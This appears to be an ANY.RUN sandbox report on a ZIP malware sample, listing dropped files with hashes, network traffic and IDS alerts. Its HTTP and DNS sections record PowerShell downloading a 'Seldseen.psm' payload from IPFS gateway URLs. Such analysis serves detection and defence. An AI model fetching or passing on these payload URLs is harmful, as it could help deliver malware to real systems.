C:\Users\admin\Desktop\_5343f66a8990fda03f679d559553ebefe1b0dfcf562cc46e8566505a4f12f34b.zip
(PID) Process:(7584) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(7584) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(7584) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(7584) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
Executable files
0
Suspicious files
3
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
7832powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b0ura1vg.pnx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7832powershell.exeC:\Users\admin\AppData\Roaming\Hastvrks.Modtext
MD5:B1955682294C6BC7FAF6994AC8B006B3
SHA256:7265005C07F2D88FC86BAE03AAB157BBD7429256526AB1A17C91F56E9D099C2D
7832powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:29A5E11E6EE1BE11A0285CEDC1EB163D
SHA256:3AA00E8C1CB78853DB64F2D2D22EFA4532BFD4B62095C7456BF36E2D284E28DA
4996powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_db2jjze0.2n1.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4996powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
2144msiexec.exeC:\Users\admin\AppData\Roaming\lkrggaptsb.datbinary
MD5:A8D2EE17DDAAA0A308BBDB207BD3997D
SHA256:4FD53E7DC91962CC0758EA70A3E57B85E3D3D473F4E065E2F416C9F0E48E8005
4996powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jww0bbn5.piy.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7832powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nqlmdha1.5aj.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
23
TCP/UDP connections
50
DNS requests
25
Threats
29

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
412
svchost.exe
GET
200
95.101.78.32:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5596
MoUsoCoreWorker.exe
GET
200
95.101.78.32:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5968
RUXIMICS.exe
GET
200
95.101.78.32:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
POST
200
40.126.31.3:443
https://login.live.com/RST2.srf
unknown
xml
11.1 Kb
unknown
POST
200
40.126.31.3:443
https://login.live.com/RST2.srf
unknown
xml
10.3 Kb
unknown
POST
200
20.190.159.130:443
https://login.live.com/RST2.srf
unknown
xml
10.3 Kb
unknown
GET
307
104.18.41.169:443
https://bafybeia7istfzup2vi5vyc5r3q3uo2xikuxbpn7f67pkqc4vd2jims4bn4.ipfs.w3s.link/Seldseen.psm
unknown
unknown
GET
200
209.94.90.3:443
https://bafybeia7istfzup2vi5vyc5r3q3uo2xikuxbpn7f67pkqc4vd2jims4bn4.ipfs.dweb.link/Seldseen.psm
unknown
unknown
POST
200
20.190.159.128:443
https://login.live.com/RST2.srf
unknown
xml
10.3 Kb
unknown
POST
200
20.190.159.131:443
https://login.live.com/RST2.srf
unknown
xml
11.0 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
412
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
5596
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5968
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.16.106.219:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
412
svchost.exe
95.101.78.32:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
5596
MoUsoCoreWorker.exe
95.101.78.32:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
5968
RUXIMICS.exe
95.101.78.32:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
6396
svchost.exe
20.190.160.3:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.124.78.146
whitelisted
www.bing.com
  • 2.16.106.219
  • 2.16.106.205
  • 2.16.106.207
  • 2.16.106.215
  • 2.16.106.226
  • 2.16.106.223
  • 2.16.106.206
  • 2.16.106.208
  • 2.16.106.218
whitelisted
google.com
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 95.101.78.32
  • 95.101.78.42
whitelisted
login.live.com
  • 20.190.160.3
  • 20.190.160.2
  • 20.190.160.22
  • 20.190.160.66
  • 20.190.160.5
  • 40.126.32.140
  • 20.190.160.130
  • 40.126.32.134
whitelisted
bafybeia7istfzup2vi5vyc5r3q3uo2xikuxbpn7f67pkqc4vd2jims4bn4.ipfs.w3s.link
  • 104.18.41.169
  • 172.64.146.87
unknown
bafybeia7istfzup2vi5vyc5r3q3uo2xikuxbpn7f67pkqc4vd2jims4bn4.ipfs.dweb.link
  • 209.94.90.3
  • 209.94.90.2
unknown
client.wns.windows.com
  • 172.211.123.250
whitelisted
slscr.update.microsoft.com
  • 74.179.77.204
whitelisted
www.microsoft.com
  • 2.20.154.94
whitelisted

Threats

PID
Process
Class
Message
7832
powershell.exe
Misc activity
ET HUNTING Observed IPFS Gateway Domain (ipfs .w3s .link) in TLS SNI
2276
svchost.exe
Misc activity
ET HUNTING IPFS Gateway Domain in DNS Lookup (ipfs .w3s .link)
2276
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] CIPFS/IPNS Gateway (w3s .link)
2276
svchost.exe
Possible Social Engineering Attempted
PHISHING [ANY.RUN] Suspected IPFS Phishing (baf .ipfs)
2276
svchost.exe
Misc activity
ET HUNTING IPFS Gateway Domain in DNS Lookup (ipfs .dweb .link)
7832
powershell.exe
Misc activity
ET HUNTING Observed IPFS Gateway Domain (ipfs .dweb .link) in TLS SNI
2276
svchost.exe
Possible Social Engineering Attempted
PHISHING [ANY.RUN] Suspected IPFS Phishing (baf .ipfs)
2276
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] IPFS/IPNS Gateway (dweb .link)
2276
svchost.exe
Potential Corporate Privacy Violation
INFO [ANY.RUN] InterPlanetary File System IPFS Service ( .ipfs .dweb .link)
Potential Corporate Privacy Violation
POLICY [ANY.RUN] InterPlanetary File System IPFS Service
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
_5343f66a8990fda03f679d559553ebefe1b0dfcf562cc46e8566505a4f12f34b.zip